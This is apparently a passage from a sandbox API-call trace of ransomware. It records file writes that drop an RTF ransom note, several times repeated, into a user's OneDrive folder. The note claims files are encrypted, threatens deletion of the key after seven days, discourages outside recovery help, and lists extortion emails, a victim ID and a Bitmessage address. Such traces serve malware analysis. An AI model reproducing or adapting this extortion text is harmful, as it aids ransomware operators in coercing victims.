\\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x9cí\x89ì'CÓì\x11÷gv\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0298.834] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.834] CloseHandle (hObject=0x27c) returned 1 [0298.848] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\#readme_eman#.rtf")) returned 0xffffffff [0298.848] GetLastError () returned 0x2 [0298.848] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ky\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ky\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 